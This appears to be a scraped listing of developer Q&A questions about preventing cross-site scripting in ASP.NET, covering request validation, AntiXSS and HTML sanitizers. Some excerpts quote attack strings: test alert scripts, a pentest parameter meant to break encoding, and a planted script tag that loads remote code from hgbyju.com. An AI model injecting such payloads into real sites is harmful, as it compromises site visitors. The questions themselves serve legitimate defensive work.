1
vote
1answer
35 views
+100
Acceptable security: Disable ValidateRequest with Paramatised SQL and HTML Encoded Strings?
I'm trying to make sure my webforms ASP.NET application is as secure as possible, it receives and stores user input data to a SQL database (the usual stuff) only for users with a login, so not ...
1
vote
0answers
55 views
Why I am getting this Javascript pop-up window when I tested my system?
I am a new developer and my Instructor in the university showed me a common security vulnerability in any ASP.NET application. He just created an empty ASP.NET application (.NET Framework 4.0) and ...
1
vote
2answers
84 views
Can we say we are safe from XSS attacks if we remove all script and java words from input
I am using asp.net htmleditorextender and unfortunately there is no working XSS sanitizer right now. So for as quick solution i am replacing all of the script and java words from user input as below
...
0
votes
1answer
72 views
HtmlAgilityPackSanitizerProvider is not working am doing incorrect?
Asp.net 4.5 , IIS 8
The sanitizer even not removing this simple script
<script>alert('error')</script>
Ok here my config
<asp:TextBox ID="txtMessageBody" TextMode="MultiLine" ...
3
votes
2answers
49 views
Is XSS possible through the MailAddress class?
Considering I parse user input, which is supposed to be an email address, into the MailAdress class:
var mailString = Request.QueryString["mail"];
var mail = new MailAddress(mailString);
Is there ...
0
votes
1answer
50 views
How to avoid this injection of script in the url of my application?
I am a new ASP.NET developer and my instructor forced me to develop a secure website/web-based application. After submitting my first application, and he told me that the application is vulnerable to ...
2
votes
1answer
131 views
SQL Injection in Stored Procedure Query
I have a stored procedure which is going to return search results depending on what the user has typed into a standard search text box. Upon pressing enter in the search box I'm passing the query to ...
2
votes
1answer
76 views
Does Bind() or Eval() automatically HtmlEncode to protect against XSS?
Forgive me if this is a silly question. I haven't been able to find the answer stated explicitly.
I rarely use Bind() or Eval() in my aspx pages, and instead use the following syntax: (Assume this ...
2
votes
3answers
149 views
Regular expressions to prevent XSS or something else?
I am trying to protect my website from Cross-Site Scripting (XSS) and I'm thinking of using regular expressions to validate user inputs.
Here is my question: I have a list of dangerous HTML tags...
...
0
votes
1answer
27 views
Should i just use html sanitizer on “rich html values”?
Do i need to sanitize all string values passed to my controller or just rich html like editors?
What about input , type text fields?
<input type="text" name"test1" ...
3
votes
1answer
156 views
Is use of the ASP.Net Request.QueryString safe in JavaScript?
Consider the following code:
funtion redirect() {
window.location = "../../index.aspx?<%=Request.QueryString%>";
}
Is this code safe or can it be exploited by an XSS attack?
If so:
...
1
vote
2answers
284 views
HttpUtility.HtmlEncode, HttpUtility.HtmlDecode, the AntiXSS library and correctly formatting user-entered input
I'm trying to develop a secure web application that can accept form data, encode it into the database to eliminate cross-site scripting issues, and then format it nicely on other web pages.
Form data ...
1
vote
0answers
90 views
Create a service proxy handler in an ASP.NET control library to prevent cross domain requests
I have created a ASP.NET library that contains several custom server controls to enable reuse of common functionality across several web applications. A couple of the controls rely on a web service to ...
3
votes
3answers
264 views
Prevent XSS attack
I am working on a ASP.Net C# + jQuery ajax website project. I am trying to prevent xss attacks and I know below is not the full approach, but this is at the least what I should do - to use ...
0
votes
1answer
93 views
Trying to insert script through textbox
I have made an ASP.NET (fw 3.5) site and wanted to check if it is vulnerable.
I accept input from a textbox and save it in the database and then display it later on another page dynamically.
If i ...
0
votes
1answer
150 views
Safe way to save/display html content in web portal asp.net mvc 3
I am making a web portal so I want to clarify some things. What is the safest way/approach to save Html content in database and to display it for other users. I have already started to make two ...
2
votes
1answer
100 views
XSS: Break out of not-complete encoding
I'm pentesting the ASP.NET application running on Microsoft-IIS/7.5 web server and I'm sending it the following GET request parameters:
&search=aaa%20%*+,-/;<=>^|"'bbb
One of the ...
0
votes
0answers
89 views
antixss module prevents uploading files
I've downloaded and added Microsoft AntiXssLibrary to my project. and changed my web.config file as follows:
<pages controlRenderingCompatibilityVersion="3.5" clientIDMode="AutoID" ...
1
vote
1answer
178 views
How do you prevent AntiXssEncoder sending numeric character reference of “Carriage Return” “Line Feed”?
The ASP .Net Mark up with the AntiXssEncoder
<asp:Textbox TextMode="Multiline" runat=server>
First Line
Second Line
</asp:TextBox>
Renders as:
<!DOCTYPE html>
<html ...
2
votes
1answer
163 views
How to .getData() from CKEditor server side (.NET)?
In APS.NET, CKeditor .Text server side property does not return the same then .getData() client side method.
Example:
If i wrote
<script> on WYSIWYG editor, server side .Text property returns ...
1
vote
1answer
57 views
Show script depending on innerwidth - without “potentially dangerous request.form”
What I want:
I have a situation where I want to show affiliate ads on my website. These are basically javascripts, with content within them. As my site has a responsive design, I want to load ...
1
vote
0answers
65 views
ASP.Net MVC simple package for whitelisting html elements?
In the perennial question - I have a comment form in which I want to allow some html elements. To prevent xss I need some sort of white-listing ability. I've been trying to find a nuget package, or ...
2
votes
2answers
140 views
Is XSS attack possible when filtering <tag? < tag is allowed
Is it possible to send XSS attack, if server filters , but <{space}tag> allows and sends back? It seems like browsers don't take < tag> as HTML tag :(
Server changes input only . (dots) to , ...
1
vote
0answers
146 views
Javascript PostBack doesn't work if in iframe under android
I developed Asp.NET website few months ago. I hosted it on some server and used free alias for website address. Alias uses iframe in which website content is shown. Example:
my site original address ...
2
votes
2answers
767 views
How to properly sanitize content with AntiXss Library?
I have a simple forums application, when someone posts any content, i do:
post.Content = Sanitizer.GetSafeHtml(post.Content);
Now, i am not sure if i am doing something wrong, or what is going on, ...
0
votes
1answer
92 views
Should asp.net developers take care of xss when request validation is enabled?
As a build-in feature, asp.net supports the request validation. So, when the request validation is enabled, should asp.net developers take care of xss? Is there still any way to complete xss ...
3
votes
2answers
1k views
How i can prevent AntiXSS Sanitizer from removing html5 <br> tag from AjaxControlToolkit HtmlEditorExtender generated html
I have added a Htmleditorextender ajax control to my asp.net web application with putting XSS sanitizer in it for XSS security but now when I retrieve the text from Htmleditorextender the sanitizer ...
3
votes
1answer
514 views
TinyMCE, AntiXSS, MVC3 and GetSafeHtmlFragment
I've read through lots of postings on SO regarding XSS and how to deal. Generally, the consensus is whitelist over blacklist and avoid using Regular Expressions (too many variants to deal with).
...
1
vote
0answers
321 views
AntiXSS HtmlEncode Textarea line break loss
I am developing web application on ASP.NET and I am getting textarea input from users and later display this input on website. While saving input into database I am not encoding input and directly ...
0
votes
0answers
256 views
How to prevent XSS attacks in ASP.NET
It seems nobody could answer to my question
So, what if there is no HtmlEditorExtender at the .aspx page and I need to prevent cross site scripting attack when user posts some message. How it can be ...
2
votes
0answers
527 views
Ajax Control Toolkit HtmlEditorExtender: Xss Attacks
I'm using Ajax Control Toolkit in my ASP.NET project and I have a problem with HtmlEditorExtender which name is ContentHtmlEditor. HtmlEditorExtender attached to TextBox which name is ContentBox.
I ...
1
vote
3answers
593 views
How to prevent XSS in Asp.NET
What are the techniques that one can use to prevent cross site scripting in asp.net? Are there any non ready implementations that one can use to achieve a website protected against xss?
0
votes
3answers
179 views
If I'm using ASP.net controls with requestvalidation, XSS should be prevented right?
Well, we all know there are always XSS vulnerabilities that can be discovered in the future and can undermine ASP.net's default request-validation security.
However, by default, validateRequest is ...
1
vote
6answers
348 views
Very hard to find malicious JS line: </title><script src=http://hgbyju.com/r.php ></script>
I am working on the site http://palacechemicals.co.uk/ which has somehow become infected with a malicious (but benign) line of JavaScript:
</title><script src=http://hgbyju.com/r.php ...
0
votes
2answers
338 views
ASP.net parsing html to make it safe. Is this ok?
I'm sure this has been asked a number of time but I'm having trouble finding something that matches what I want.
I want to be able to safely render html in my webpage but only allow links, and tags
...
2
votes
2answers
1k views
MvcHtmlString.ToHtmlString() not encoding HTML?
Related to this question I play around with XSS issues in my ASP.NET MVC project and I´m confused with the MvcHtmlSTring.ToHtmlString() method. From the documentation "Returns an HTML-encoded string ...
3
votes
2answers
638 views
Is PagesSection.ValidateRequest enough to prevent XSS in asp.Net
In asp.net is the PagesSection.ValidateRequest method enough to prevent all XSS attacks or is there something more that needs to be done?
Can anyone point me to a more thorough resource on this topic ...
0
votes
1answer
466 views
AntiXSS - HtmlAttributeEncode usage
I am trying to figure out the context in which HtmlAttributeEncode could be used -
I tried with simple 'Hello!' alert script to be set as control attribute, so I could see HtmlAttributeEncode in ...
0
votes
0answers
234 views
ASP.net Generic Handler, JSONP and Invalid Label Error
I am trying to get some data from a generic asp.net handler on am externally hosted site (though this is our company's web site and server). I have to display the data returned from this handler. ...
0
votes
1answer
855 views
Bypass XSS blacklist “<”, “>”, “&” input nvarchar
I'm using some software that is blacklisting certain characters "<", ">", "&" for user submitted values.
It isn't HTML encoding the values when displaying the submitted results (outputs all ...
3
votes
4answers
448 views
Is it enough to use HTMLEncode to display uploaded text?
We're allowing users to upload pictures and provide a text description. Users can view this through a pop up box (actually a div ) via javascript. The uploaded text is a parameter to a javascript ...
0
votes
1answer
960 views
How to write in asp.net web.config httpRuntime for 3.5 framework
This attribute is new in the .NET Framework version 4.0.I have web.config file in solution with 4.0 version of .Net Framework
<system.web>
<httpRuntime ...
2
votes
1answer
227 views
Create a filter attribute for a controller action parameter anti XSS attack
I have a simple controller like that:
[CustomFilter()]
public ActionResult Index( int? page ) {
return View();
}
public class CustomFilterAttribute : ActionFilterAttribute
{
public override ...
0
votes
2answers
108 views
ASP.NET Protecting an editable IFrame from XSS
As part of a webapp I'm building, there is an iframe that allows the currently logged in user to edit some content that will only be displayed in their own logged-in profile, or on a public page with ...
1
vote
0answers
229 views
Potential XSS attack inside an uploaded XML file
Is there a way to check an uploaded xml file for potential XSS attack in ASP.net? I know this can be easily done by manually validating the data in the XML but I have a lot of modules in my ...
1
vote
2answers
147 views
Preventing against attacks when saving data as XML
We have a web application that saves survey data in XML format, rather than to a standard database. It uses a third-party survey component (actually, this component, but modified to add some ...
2
votes
2answers
330 views
HttpRequestValidationException and cross-site scripting XSS
By using HttpRequestValidationException, does it necessarily protect you against all cross-scripting threats?
Are there situations where a potentially dangerous script might manage to go undetected?
5
votes
3answers
495 views
Protecting my self from cross-site scripting
I have implemented a Request.QueryString["somestr"].ToString();
I suppress cross site scripting by doing HttpUtility.HtmlEncode(Request.QueryString["somestr"].ToString();
I still have an issue where ...
0
votes
2answers
600 views
XSS vulnerabilities occur, how to solve this? [closed]
I got security issue in our application. I am not understanding below question, Please any one let me know, what it is and how to solve this generic issue? How to scan website with security related ...
-1
votes
2answers
350 views
What is a Generic Approach to preventing XSS attacks in ASP.NET?
I need a generic method for preventing XSS attacks in ASP.NET. The approach I came up with is a ValidateRequest method that evaluates the HttpRequest for any potential issues, and if issues are ...

